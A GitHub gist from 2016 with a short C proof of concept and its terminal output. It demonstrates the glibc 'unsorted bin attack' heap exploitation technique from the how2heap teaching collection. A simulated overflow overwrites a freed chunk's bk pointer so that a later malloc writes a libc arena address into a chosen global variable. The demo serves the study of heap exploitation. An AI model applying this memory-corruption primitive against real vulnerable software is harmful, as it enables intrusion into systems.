Created
October 18, 2016 02:23
-
-
Save inaz2/7ebf4d2561a0d45be0d5dca5350ca707 to your computer and use it in GitHub Desktop.
unsorted bin attack / https://github.com/shellphish/how2heap
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ gcc unsorted_bin.c -o unsorted_bin | |
| $ ./unsorted_bin | |
| target = 1 | |
| [+] allocate p1, p2, p3 | |
| p1 = 0x1429420 | |
| p2 = 0x14294b0 | |
| p3 = 0x1429550 | |
| [+] free p2 | |
| [+] abusing p1 overflow | |
| [+] allocate p4 with the same size of p2 | |
| p4 = 0x14294b0 | |
| [+] target is overwritten with a large number: &(main_arena->top) | |
| target = 7f4112122b78 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| unsigned long target = 1; | |
| int main(){ | |
| printf("target = %lx\n", target); | |
| puts("\n[+] allocate p1, p2, p3"); | |
| char *p1 = malloc(0x80); | |
| char *p2 = malloc(0x90); | |
| char *p3 = malloc(0xa0); | |
| printf("p1 = %p\n", p1); | |
| printf("p2 = %p\n", p2); | |
| printf("p3 = %p\n", p3); | |
| puts("\n[+] free p2"); | |
| free(p2); | |
| puts("\n[+] abusing p1 overflow"); | |
| *(void **)(p1+0x98) = (void *)&target-0x10; | |
| puts("\n[+] allocate p4 with the same size of p2"); | |
| char *p4 = malloc(0x90); | |
| printf("p4 = %p\n", p4); | |
| puts("\n[+] target is overwritten with a large number: &(main_arena->top)"); | |
| printf("target = %lx\n", target); | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment